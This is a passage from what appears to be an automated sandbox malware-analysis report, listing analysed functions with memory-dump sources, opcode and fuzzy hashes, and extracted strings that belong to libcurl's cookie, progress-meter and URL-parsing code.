                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 0d29268d505926d4a74bee1b5aa855540b2933c20c0474cb3d2f9b259fb21cbf
                                                  • Instruction ID: 3690397ae2ad20032031177c1d652c837c73163532044034cd6c749187bdc2e8
                                                  • Opcode Fuzzy Hash: 0d29268d505926d4a74bee1b5aa855540b2933c20c0474cb3d2f9b259fb21cbf
                                                  • Instruction Fuzzy Hash: B3C08CE0C1030082C701BB3C814610E79E07740208FC00EA8D88492181F228D3188253
                                                  Function 072E0007 Relevance: .1, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633537384.00000000072E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3aacab809e62b5f6da4a2b4fab5fb61ed6cbd2cd37a4648d78f41568c3068530
                                                  • Instruction ID: 773cc6386effb24daf24c90cc92f2e1e141b78c4eec72c1851bd61b2675021c3
                                                  • Opcode Fuzzy Hash: 3aacab809e62b5f6da4a2b4fab5fb61ed6cbd2cd37a4648d78f41568c3068530
                                                  • Instruction Fuzzy Hash: 0B11A0EB1BC210BCE52280869B14BFA6A6EE3D3730FB19026F843DD586F2D44A4B1070
                                                  Function 072E0024 Relevance: .1, Instructions: 86COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633537384.00000000072E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9a7e8d76d2d1b3b5c596877804326cc9faaf7640d3bfcea749dff52f38d3d590
                                                  • Instruction ID: d4a945f828f4fd832c9699703da4d35949a1b4d5d924e6075f208546d0a537a7
                                                  • Opcode Fuzzy Hash: 9a7e8d76d2d1b3b5c596877804326cc9faaf7640d3bfcea749dff52f38d3d590
                                                  • Instruction Fuzzy Hash: 5811A1EB17C114BCE52684829B14BFA666EE3D3330FB19066F843DD586F6D54A4F1035
                                                  Function 072E0000 Relevance: .1, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633537384.00000000072E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8f2fbfa539fcec0490cdf941720b1a986c0e1f5acbe7873bcb051c4a73b25357
                                                  • Instruction ID: 1317de73a46b517a698d8a109977e71e872131291a67754175941b4a659cf827
                                                  • Opcode Fuzzy Hash: 8f2fbfa539fcec0490cdf941720b1a986c0e1f5acbe7873bcb051c4a73b25357
                                                  • Instruction Fuzzy Hash: 6D01ADEB1BC110BDF12284429F14BBA262EE3E3330FF18026B843EE186F6D44A4B1031
                                                  Function 07230AE8 Relevance: .1, Instructions: 84COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633351582.0000000007230000.00000040.00001000.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7230000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dcdcaee38893a43087d10906067ae1388da8a1b795056dccdea50e1e21f30a32
                                                  • Instruction ID: ac6fc2532848bed45cfde44b4710a0d97c762fc4b2b9598d95b4dfecbbaa5a88
                                                  • Opcode Fuzzy Hash: dcdcaee38893a43087d10906067ae1388da8a1b795056dccdea50e1e21f30a32
                                                  • Instruction Fuzzy Hash: F40180E7229210BEF611C191AF60BFB676FEBC6734F30882BF506D2142D3E80A4A5175
                                                  Function 072E003B Relevance: .1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633537384.00000000072E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3d00e7afaff61792bc84f07da9266e41102afb4d8c3de6202648b5b38c32b800
                                                  • Instruction ID: ed73b0ccea0b75cdac17cac644f2d6032e6055d75ea3f378cf9d233d940e6fad
                                                  • Opcode Fuzzy Hash: 3d00e7afaff61792bc84f07da9266e41102afb4d8c3de6202648b5b38c32b800
                                                  • Instruction Fuzzy Hash: E601C4EB17C110BDE52384829B14BF9676EE7D3730FB08066F843EE586E6D50A4B1031
                                                  Function 072E0109 Relevance: .1, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633537384.00000000072E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: aa21c02f104bc9c9e8a69beaf114754e391983957bef5d0d7932591200a7c162
                                                  • Instruction ID: 86f6b1faa29e7cf90efd7e3eb56c4972fb0d03f82740cae75bf342939e3b4ffe
                                                  • Opcode Fuzzy Hash: aa21c02f104bc9c9e8a69beaf114754e391983957bef5d0d7932591200a7c162
                                                  • Instruction Fuzzy Hash: 81119EE647C2815FCB134AB085057A97F796B17370BB51697D0D24F4A2F2E1890782A1
                                                  Function 07230AF6 Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633351582.0000000007230000.00000040.00001000.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7230000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 97373e3865bc72b6a0424ee34f2d3f1f7230a2bcef61c0ad240a65a1fda7e859
                                                  • Instruction ID: 48db2d33cb4bcd428ae671a20b78aa886062eec2bb3a8bf51aec8bb7555d1e65
                                                  • Opcode Fuzzy Hash: 97373e3865bc72b6a0424ee34f2d3f1f7230a2bcef61c0ad240a65a1fda7e859
                                                  • Instruction Fuzzy Hash: 04012CE7239220BEF651C4916B60BFB676FEBC6734B30C82BF506D1105D2E80E495175
                                                  Function 07230B17 Relevance: .1, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633351582.0000000007230000.00000040.00001000.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7230000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2fd95e6d47771225987faf37f2f646bf8285a7183ef696398559141b380de2de
                                                  • Instruction ID: 571c65d80de93d7830326aff1bbf3ade00dc5870da121277d950cf3a1c840b3a
                                                  • Opcode Fuzzy Hash: 2fd95e6d47771225987faf37f2f646bf8285a7183ef696398559141b380de2de
                                                  • Instruction Fuzzy Hash: 950124EB63D250ADF621C0946A20BFB676BDBC6B34F30886BF102C6041D2E40A4A5135
                                                  Function 07230B61 Relevance: .1, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633351582.0000000007230000.00000040.00001000.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7230000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6549c32887708754c161c41c58a4625c2851a8c82d20fb4f813e6a610849263a
                                                  • Instruction ID: e614d7dcaecc1e3986c545a033c3a1a788ecc6194f5b56d266a029b9a7af0390
                                                  • Opcode Fuzzy Hash: 6549c32887708754c161c41c58a4625c2851a8c82d20fb4f813e6a610849263a
                                                  • Instruction Fuzzy Hash: 3A018FEB239220BEF621C0956B14BFB676FEBC6735F30882BF506D5441E3E80A495175
                                                  Function 072E0060 Relevance: .1, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633537384.00000000072E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6804b23de60669ff13f4ba783f9ce3d095e4541c6aa3ebb1a6071e68ac6960d4
                                                  • Instruction ID: 093ad55390b9ecf2834d7511a7df26e6a6c0e3b34c2f642818741f24c1136044
                                                  • Opcode Fuzzy Hash: 6804b23de60669ff13f4ba783f9ce3d095e4541c6aa3ebb1a6071e68ac6960d4
                                                  • Instruction Fuzzy Hash: FB0147FB57C211AED73B445186117BD776AA793330FF09031F443AE586F6E1464B2021
                                                  Function 07230B30 Relevance: .1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633351582.0000000007230000.00000040.00001000.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7230000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3e9e5ea4692d9b21de84eda0bfed4970368846fe856021c7d561834ff5586b31
                                                  • Instruction ID: 2b6cbe00225312b4e1da861f864d189700a3af0d6c51a9350581cea084dd541e
                                                  • Opcode Fuzzy Hash: 3e9e5ea4692d9b21de84eda0bfed4970368846fe856021c7d561834ff5586b31
                                                  • Instruction Fuzzy Hash: 10F081EB639210ADFA21C5906B50BFF67AEDAC6734B30883BF502D5101D2E4094A5136
                                                  Function 072E009C Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633537384.00000000072E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 50a2fce76fc4072e75e0c9c00e23ffea071b338f93d3ed17035cbbc4a386b7ea
                                                  • Instruction ID: e52bd49ba962240f23256c8d44dc8461d4034613b4ce7580f71f1d6a48f734b7
                                                  • Opcode Fuzzy Hash: 50a2fce76fc4072e75e0c9c00e23ffea071b338f93d3ed17035cbbc4a386b7ea
                                                  • Instruction Fuzzy Hash: 8601F2E90BC600DEC7270AA089217B96F69BB23330FB051AAD4835E193E5F5064B4121
                                                  Function 07230B94 Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633351582.0000000007230000.00000040.00001000.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7230000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 868e8d6982e1613b7a629b1fd342ce875a10af8dfc697cd0aa02daf1c9b26377
                                                  • Instruction ID: b94c8ebd9a52cf2c1f546537a614d7a4b9c84908da64574e6e2b1f3d3ec301d0
                                                  • Opcode Fuzzy Hash: 868e8d6982e1613b7a629b1fd342ce875a10af8dfc697cd0aa02daf1c9b26377
                                                  • Instruction Fuzzy Hash: B0F0E5E76392219DF622D0A027147FE67ABEBCA335B308867E002D5000E3E80D465135
                                                  Function 072E00A3 Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633537384.00000000072E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9728a8a82b15a3c235ac9122f73322dd9a8d063ab4c923bebbae88d21a68aca5
                                                  • Instruction ID: 8571e09a579a50badc1ad77fe5cf1f6dab0f5fb5bd406a2b18e3beacad1683c2
                                                  • Opcode Fuzzy Hash: 9728a8a82b15a3c235ac9122f73322dd9a8d063ab4c923bebbae88d21a68aca5
                                                  • Instruction Fuzzy Hash: BCE092DA4BC204F8CA770994CA15B7D6A2EB373330EF0A111E4973C58AB6F1175B1422
                                                  Function 072E00D6 Relevance: .0, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633537384.00000000072E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3ad506703666ae27401da03c219caa7fbd618715f562a58ef417814c244b14d8
                                                  • Instruction ID: b28c5552577199e3173f50e14b5a75f2c9ffae65330e7416d2e706eeb77632c7
                                                  • Opcode Fuzzy Hash: 3ad506703666ae27401da03c219caa7fbd618715f562a58ef417814c244b14d8
                                                  • Instruction Fuzzy Hash: A8E0E5EA4B8204A9CB6B0AE44605B7CB92E3727330FF05125E8432E495F2F106065070
                                                  Function 07230B7B Relevance: .0, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633351582.0000000007230000.00000040.00001000.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7230000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 59d74317a573d1707ed8008beb833657fe8f0489dbebaba0a9cd27ebc3d7b8dd
                                                  • Instruction ID: 3d2b0d23f9afde9098345dfbe90d62e56934a114e886142ea50c01b17b42c858
                                                  • Opcode Fuzzy Hash: 59d74317a573d1707ed8008beb833657fe8f0489dbebaba0a9cd27ebc3d7b8dd
                                                  • Instruction Fuzzy Hash: 19E092E6629314EEE611D5E056247FE77FBDBDA335B3088A6E001E2041E3F44D458238
                                                  Function 072E00EB Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2633537384.00000000072E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_72e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 366f6e3be22a704c0429f28d7afb9acde33c28bb8dd39a2ead4c7e6793610512
                                                  • Instruction ID: c69434a4d8a316cedd1f60b0a518e85f0e898ef478115a5ae690acce4d37eb25
                                                  • Opcode Fuzzy Hash: 366f6e3be22a704c0429f28d7afb9acde33c28bb8dd39a2ead4c7e6793610512
                                                  • Instruction Fuzzy Hash: 79E086EA478104F9CA6B0E904505B7D6A3E7773330FF06125E4972C454B6F116179470

                                                  Non-executed Functions

                                                  Function 00571BE0 Relevance: 33.9, Strings: 26, Instructions: 1418COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                  • API String ID: 0-1371176463
                                                  • Opcode ID: 44446b6a928775771e8bb92efb7792806794e3b5534c7ec703cfc5721dedc991
                                                  • Instruction ID: e78fb636bff54b64763bb7a1390d9563fba47cba3a58a102a5bad10a23026cd6
                                                  • Opcode Fuzzy Hash: 44446b6a928775771e8bb92efb7792806794e3b5534c7ec703cfc5721dedc991
                                                  • Instruction Fuzzy Hash: 56B23AB1A08741ABE7356A24EC46B667FD5BF94304F08893CF88D97282E771EC50E752
                                                  Function 00544940 Relevance: 17.0, Strings: 13, Instructions: 731COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                  • API String ID: 0-122532811
                                                  • Opcode ID: 80a786eb4a842b2aa16d367cdf04c88ccc2f836778ea5c28a54c2841f45c2aea
                                                  • Instruction ID: e6be7ab826f3d92fa7736ed4eb8d363bf4ad4e91fd8b96ba896eaebe5806bdd8
                                                  • Opcode Fuzzy Hash: 80a786eb4a842b2aa16d367cdf04c88ccc2f836778ea5c28a54c2841f45c2aea
                                                  • Instruction Fuzzy Hash: 5942E771B08701ABD708DE28CC45BABBBEAFBC4704F04892CF55D97391E775A9148B92
                                                  Function 00543ED0 Relevance: 15.7, Strings: 12, Instructions: 689COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
                                                  • API String ID: 0-3977460686
                                                  • Opcode ID: f6db024203b1f9b4d85e61de53ebb9b02d54aa2431988a37ba956598325535b4
                                                  • Instruction ID: a52a0e0f03107466bbeda9d6e862f8bd7ddb962ac78b85294ad30dc62f59a494
                                                  • Opcode Fuzzy Hash: f6db024203b1f9b4d85e61de53ebb9b02d54aa2431988a37ba956598325535b4
                                                  • Instruction Fuzzy Hash: 1F326B71A483014BC7249F289C413EABFD5BBD5328F154B2DE9A98B3D2E734D9458F82
                                                  Function 00554F70 Relevance: 12.2, Strings: 9, Instructions: 911COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631171913.0000000000BDA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000BDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000D63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631190257.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631484798.0000000000F73000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631607205.0000000001132000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2631624604.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                                  • API String ID: 0-1914377741
                                                  • Opcode ID: 048d7dccb680fa645d44c3a33f69b6b4400815ea72a3a55ef59cb803207e87cd
                                                  • Instruction ID: 571e67efd1c4c92a09c48eb4137495a0bb35ef86e1b58fb245f8134ace03168b
                                                  • Opcode Fuzzy Hash: 048d7dccb680fa645d44c3a33f69b6b4400815ea72a3a55ef59cb803207e87cd
                                                  • Instruction Fuzzy Hash: 8C724A31608B419BEB218A28C4767A67FD2BF90745F048A2DED855B293F7B6DD8CC341
                                                  Function 005E9880 Relevance: 10.2, Strings: 8, Instructions: 226COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630715713.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                  • Associated: 00000000.00000002.2630696161.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2630715713.0000000000BD5000.00000040.00000001.01000000.00000003.sdmpDownload File
